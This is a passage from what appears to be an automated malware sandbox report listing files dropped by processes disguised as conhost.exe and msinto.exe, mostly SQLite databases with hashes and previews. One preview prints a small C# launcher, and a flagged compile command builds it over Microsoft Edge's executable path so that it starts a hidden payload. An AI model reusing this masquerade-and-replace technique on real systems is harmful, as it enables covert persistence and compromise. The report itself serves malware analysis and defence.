                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\YqDMoObmj9

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Z7SOrF37Zk

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ZDhtWMKIVq

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ZEEkdFsWOI

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ZYbVYOz1sR

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ZeUdmK43gT

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ZnZBKKpGAd

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Zt5ys2tWg6

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\aUDfp3N2kY

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\aXRR3PLz73

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\aizoXTHDJQ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ak3B5ey2Im

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\argUH8ktjB

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\b8i0avu0ST

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\bF6W7GMVNu

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.0.cs

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):412
                                                          Entropy (8bit):5.0744968030716295
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLnD4k1HiFkD:JNVQIbSfhWLzIiFkMSfhH1CFkD
                                                          MD5:BF577EDCB4FE2CD16EBB5308CE3FA76E
                                                          SHA1:8B95D6143E029B25BBBB78B9B96EA7FB1808C5D4
                                                          SHA-256:2BDBD8F103B81DB3F9B4F9D433E76862179E812ED8DAE360249170DA4BB7594C
                                                          SHA-512:E4DA532E0FBCE58DE1D64A2CB77266BB09BD0B2C35B2F73123AC36A169CFCA61DFF4A48361F86111CE7BDC1F995A3B9642DB61E448F70CF9284E26783765A6AF
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"); } catch { } }).Start();. }.}.

                                                          C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):268
                                                          Entropy (8bit):5.10085159173431
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723f0sn:Hu7L//TRRzscQnacs
                                                          MD5:47BB785CAC8E9EB9F285E1565A1DFCC4
                                                          SHA1:B8A761B3AB4145D2736A5A5F772E8ACAAF23F9B2
                                                          SHA-256:5B40BF2E7A1B8B4087BC2AE1401CAEBA7F51C6C66F66DB9EBE1E5AC930C1ABB7
                                                          SHA-512:EF428420C239F38D28BFBBCD87561DB1B1FA386955629B54AEBAB09FB0BCDCFB2F76C7F28CB65710CC09EC6A6EBB576ABAFE6F992AA470F6BB43224D486F6ECB
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.out

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (340), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):761
                                                          Entropy (8bit):5.239397151398335
                                                          Encrypted:false
                                                          SSDEEP:12:zI/u7L//TRRzscQnacZKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/VRzstnaCKax5DqBVKVrdFAMBJj
                                                          MD5:5C92C100128C2B7B4F070C4DFCFF7E87
                                                          SHA1:CECA7074A2FC3021702A0698FDFE94D5FBEA72D8
                                                          SHA-256:0345920813C4E31800DFCB99469DAF7EE49226C862EF0977E6333A0460AB2FBE
                                                          SHA-512:8D848A05071AAEDFBB6B814377F4FB9F583BC15621E34EA55371FEF66B4BBD825A192072EA2C4C0CB0701037E73B5D4B82F4502C84149C137EEA1A84E5D484BB
                                                          Malicious:false
                                                          Preview:.C:\blockhostnet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\cEWquYTWM8

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\cqDbNFEjza

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\d6IG2VxpRi

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.643856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:KPnNyMS35VE:aDOE
                                                          MD5:020B33B31E581FAC23E4A03457CA8B7F
                                                          SHA1:A2EE25C64CA16B3433CA8532F4C3653DF4C5820F
                                                          SHA-256:898994928424E34BC0E3562EB63418C058F149F2516574C371623327495CF3D4
                                                          SHA-512:4B12C63732A38004132B7B5D71B11FC6D90C5254B48103DDCCAEF673219BD128C975EECC982B7D9F92A108F42DD16F6C4E2C6146989F8B1F45228FF9F3DC1217
                                                          Malicious:false
                                                          Preview:SwezdcN3IQBFTWih7RAUjmErq

                                                          C:\Users\user\AppData\Local\Temp\eRmxc4BNpu

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ekm6vOcB9B

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ew1vPjSH17
